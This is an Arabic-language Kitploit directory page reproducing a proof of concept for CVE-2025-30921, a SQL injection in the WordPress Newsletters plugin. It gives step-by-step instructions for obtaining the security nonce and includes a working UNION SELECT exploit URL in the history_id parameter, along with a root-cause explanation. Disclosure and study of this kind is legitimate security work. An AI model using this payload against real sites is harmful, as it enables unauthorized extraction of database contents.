Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-30921 — PoC لـ CVE-2025-30921 | Kitploit
أدوات/GitHubGitHub/dottak/cve-2025-30921
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubdottak/cve-2025-30921

CVE-2025-30921

PoC لـ CVE-2025-30921

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-30921

1️⃣ نوع المكون

إضافة ووردبريس

2️⃣ تفاصيل المكون

اسم المكون Newsletters

الإصدار الضعيف <= 4.9.9.7

معرف المكون newsletters-lite

رابط المكون https://wordpress.org/plugins/newsletters-lite/

3️⃣ OWASP 2017: أعلى 10

فئة الثغرة A3: حقن

نوع الثغرة SQL حقن

4️⃣ المتطلبات الأساسية

مدير

5️⃣ تفاصيل الثغرة

👉 وصف موجز

عند عرض مخطط إحصائيات النظرة العامة في لوحة تحكم الإضافة (/wp-admin/admin.php?page=newsletters) لإضافة Newsletters الإصدار 4.9.9.7 أو أقل، تحدث ثغرة حقن SQL بسبب عدم كفاية التحقق من الإدخال ومعالجة التهرب من معلمات URL.

من خلال هذه الثغرة، يمكن للمهاجم الحاصل على صلاحيات المدير استغلالها لاستخراج معلومات قاعدة البيانات من الموقع المستهدف.

👉 كيفية إعادة الإنتاج (PoC)

  1. قم بإعداد موقع ووردبريس مثبت عليه إضافة Newsletters الإصدار 4.9.9.7 أو أقل.

  2. انتقل إلى قائمة لوحة تحكم إضافة Newsletters (/wp-admin/admin.php?page=newsletters).

    image

  3. باستخدام أدوات المطور في المتصفح، ابحث عن action=wpmlwelcomestats&security= في علامة تبويب 'Elements' وتحقق من قيمة security. على سبيل المثال، إذا ظهرت نتيجة البحث كما هو موضح أدناه، دوّن القيمة 22b1ac0de6.

    root@kitploit:~
    // ...
    
    jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
    
    // ...
    

    image

  4. أدخل قيمة security التي دوّنتها في قسم <SECURITY VALUE> من مسار URL أدناه وأرسل طلبًا إلى ذلك URL

    root@kitploit:~
    http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
    

👉 معلومات إضافية (اختياري)

[السبب الجذري للثغرة]

عند طلب URL الذي تحدث فيه ثغرة حقن SQL في PoC أعلاه، يتم استدعاء الدالة ajax_welcomestats داخل الملف /wp-content/plugins/newsletters-lite/wp-mailinglist-plugin.php.

في هذه المرحلة، يتم استخدام معامل الطلب history_id مباشرة كشرط في سلسلة استعلام SQL وتهيئته كمتغير $history_condition. ثم يتم تمرير هذا المتغير إلى استعلام قاعدة البيانات دون أي معالجة تهرب.

image

لذلك، نظرًا لعدم وجود تحقق أو معالجة تهرب للقيم المدخلة في معامل URL history_id، تحدث ثغرة حقن SQL. (لاحظ أن معاملي URL from و to معرضان أيضًا لهجمات حقن SQL بسبب عدم كفاية التحقق من الإدخال ومعالجة التهرب.)

6️⃣ عرض الاستغلال

video

7️⃣ المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30921
تنزيل الأداة

من بين معلمات URL، يحتوي history_id على حمولة حقن SQL، مما يسمح بالاستعلام عن اسم قاعدة البيانات (DATABASE()) والإصدار (@@VERSION). على سبيل المثال، عندما تكون قيمة security هي 22b1ac0de6، قم بالوصول إلى URL التالي.

http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=22b1ac0de6&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23

  • عند فحص استجابة طلب URL، يمكنك تأكيد أن اسم قاعدة البيانات ومعلومات الإصدار قد تم كشفها بسبب ثغرة حقن SQL عبر المعامل history_id.

    image